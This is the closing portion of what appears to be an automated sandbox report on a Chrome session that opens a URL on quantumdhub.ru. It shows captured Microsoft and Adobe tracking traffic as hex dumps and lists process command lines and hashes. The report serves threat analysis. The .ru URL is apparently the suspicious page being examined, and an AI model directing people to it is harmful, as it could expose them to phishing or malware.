                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 6d 69 63 72 6f 73 6f 66 74 33 36 35 2d 6c 65 61 64 67 65 6e 2d 76 69 2d 76 6e 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 6f 66 66 69 63 65 33 36 35 2d 6c 65 61 64 67 65 6e 2d 76 69 2d 76 6e 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 74 65 73 74 45 6c 65 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 51 75 79 25 45 31 25 42 42 25 38 31 6e 25 32 30 72 69 25 43 33 25 41 41 6e 67 25 32 30 74 25 43 36 25 42 30 25 32 30 76 25 43 33 25 41 30 25 32 30 63 6f 6f 6b 69 65 27 29 3b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                          Data Ascii: break; case 'microsoft365-leadgen-vi-vn': case 'office365-leadgen-vi-vn': latestEle.innerHTML = decodeURIComponent('Quy%E1%BB%81n%20ri%C3%AAng%20t%C6%B0%20v%C3%A0%20cookie');


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          29192.168.2.55010452.210.83.1544433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC519OUTGET /id?d_visid_ver=4.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=EA76ADE95776D2EC7F000101%40AdobeOrg&d_nsid=0&ts=1734737818811 HTTP/1.1
                                                                                                                                                                                                                                                          Host: dpm.demdex.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          Cookie: demdex=65697634601447774650234603073451317819
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:37:03 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 6649
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-TID: nZshf6adRh0=
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                          Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                          DCS: dcs-prod-irl1-1-v069-014639bbd.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                          set-cookie: demdex=65697634601447774650234603073451317819; Max-Age=15552000; Expires=Wed, 18 Jun 2025 23:37:03 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC6649INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 36 35 39 35 35 39 36 30 30 38 34 35 36 33 36 34 35 33 34 30 32 38 30 37 30 36 32 31 33 35 36 38 38 35 32 37 38 38 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                          Data Ascii: {"d_mid":"65955960084563645340280706213568852788","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          30192.168.2.55010663.140.62.174433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC748OUTGET /id?d_visid_ver=4.4.0&d_fieldgroup=A&mcorgid=EA76ADE95776D2EC7F000101%40AdobeOrg&mid=65955960084563645340280706213568852788&ts=1734737820889 HTTP/1.1
                                                                                                                                                                                                                                                          Host: msftenterprise.sc.omtrdc.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://www.microsoft.com
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://www.microsoft.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC442INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          access-control-allow-origin: https://www.microsoft.com
                                                                                                                                                                                                                                                          access-control-allow-credentials: true
                                                                                                                                                                                                                                                          date: Fri, 20 Dec 2024 23:37:03 GMT
                                                                                                                                                                                                                                                          p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                          server: jag
                                                                                                                                                                                                                                                          vary: Origin
                                                                                                                                                                                                                                                          content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                          Data Ascii: {}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          31192.168.2.55011152.210.126.1644433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC754OUTGET /dest5.html?d_nsid=0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: mscom.demdex.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                          Referer: https://www.microsoft.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          Cookie: demdex=65697634601447774650234603073451317819
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:37:04 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 6983
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-TID: juQGST6oSSc=
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                          Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 10:06:57 GMT
                                                                                                                                                                                                                                                          DCS: dcs-prod-irl1-1-v069-0f8f00e46.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:18:35:33
                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:18:35:36
                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1624 --field-trial-handle=2032,i,17181791565216499236,9261844077795664136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:18:35:42
                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/"
                                                                                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          No disassembly